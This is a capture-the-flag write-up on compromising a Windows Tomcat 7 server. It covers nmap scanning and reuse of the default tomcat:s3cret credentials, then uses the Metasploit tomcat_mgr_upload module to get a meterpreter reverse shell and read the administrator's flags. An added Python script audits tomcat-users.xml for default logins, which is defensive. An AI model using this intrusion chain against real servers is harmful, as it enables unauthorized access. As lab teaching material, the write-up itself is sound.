2 March 2021

Starting information

  • Machine IP :
  • System : Windows

Network enumeration

I start by adding an entry to my /etc/hosts file to avoid typing the IP every time:

/etc/hosts jerry

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- jerry -Pn
Not shown: 65534 filtered ports
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.14 seconds

There is only one open port: 8080. Now I can start nmap scripts on the open port to gather more information:

nmap -p8080 -A -Pn jerry

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Web page

Accessing the web page on port 8080 shows the default Apache Tomcat page. Three buttons are of interest:

  • Server Status
  • Manager App
  • Host Manager

When clicking these buttons, HTTP basic authentication is requested. If it fails, a page with a default message is displayed, which contains the following text:

For example, to add the admin-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

Could the administrator have used these default credentials when configuring the application? Yes: the credentials are tomcat:s3cret.

Server status

The server status page gives us a bunch of information about the server:

Tomcat Version   : Apache Tomcat/7.0.88
JVM Version      : 1.8.0_171-b11
JVM Vendor       : Oracle Corporation
OS Name          : Windows Server 2012 R2
OS Version       : 6.3
OS Architecture  : amd64
Hostname         : JERRY
IP Address       : 10.10.10.95

Web application manager

The application manager page gives us commands to start and stop applications and to deploy files.

Information gathered

After scanning the ports with nmap and OpenVAS and looking at the application, here is the information gathered.

Operating System

Windows Server 2012 R2 (6.3, amd64)

Open ports

8080/tcp   Apache Tomcat/7.0.88


Here are the vulnerabilities found by OpenVAS:

Apache   HTTP Brute Force Logins With Default Credentials Reporting      High
Apache   Apache Tomcat Manager Remote Unauthorized Access Vulnerability  High

These two findings report that the server uses the default credentials admin:admin and tomcat:s3cret, one of which (tomcat:s3cret) was already found on the authentication error page.
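As an added example (not part of the original writeup), a small Python audit of a tomcat-users.xml, the file the Tomcat 401 page tells administrators to edit. It flags the documentation defaults the scanner reports (tomcat:s3cret, admin:admin) and rates them highest when they are tied to a deploy-capable manager role, which is exactly what turns a default login into code execution. The sample XML, the default-credential list and the 12-character threshold are constructed for this example; the real file lives in Tomcat's conf directory.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml (not taken from the box). It mirrors the
# example the Tomcat 401 page quotes, plus a few other accounts for contrast.
SAMPLE_TOMCAT_USERS = """
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="admin" password="admin" roles="manager-gui"/>
  <user username="deploy" password="Xq9!vL2#pR8wT0zK" roles="manager-script"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="viewer" password="tomcat" roles="probeuser"/>
</tomcat-users>
"""

# Username/password pairs shipped in Tomcat's documentation and sample config;
# these are what default-credential scanners try first (assumed list).
DEFAULT_CREDENTIALS = {
    ("tomcat", "s3cret"), ("admin", "admin"), ("tomcat", "tomcat"),
    ("admin", "tomcat"), ("both", "tomcat"), ("role1", "tomcat"),
}

# Roles that allow deploying a WAR through the Manager/Host Manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}


def audit_tomcat_users(xml_text):
    """Return {username: severity} for every risky account.

    HIGH   = known default credentials on an account with a deploy-capable role
    MEDIUM = known default credentials, or a short password with a deploy role
    LOW    = short password on an unprivileged account
    Assumes plaintext passwords (Tomcat's default, no CredentialHandler).
    """
    results = {}
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":   # tolerate the xmlns on the root
            continue
        name, pwd = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        privileged = bool(roles & PRIVILEGED_ROLES)
        default = (name, pwd) in DEFAULT_CREDENTIALS
        short = len(pwd) < 12
        if default and privileged:
            results[name] = "HIGH"
        elif default or (short and privileged):
            results[name] = "MEDIUM"
        elif short:
            results[name] = "LOW"
    return results
```

Run against the sample, the two accounts that would let this box be deployed to come back HIGH; the strong-password deploy account is not reported.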


The default credentials can be used to exploit the Manager application with Metasploit. After searching for tomcat in Metasploit I selected the exploit multi/http/tomcat_mgr_upload and configured it with the following parameters:

LHOST   my ip

In the Metasploit console, run use <exploit_path> to select an exploit, and set <option_name> <value> to configure an option.

Once everything is set up, I run exploit and get a shell:

meterpreter > getuid
Server username: JERRY$

meterpreter > sysinfo
Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

From there, the flags are already accessible:

cat ../Users/Administrator/Desktop/flags/2\ for\ the\ price\ of\ 1.txt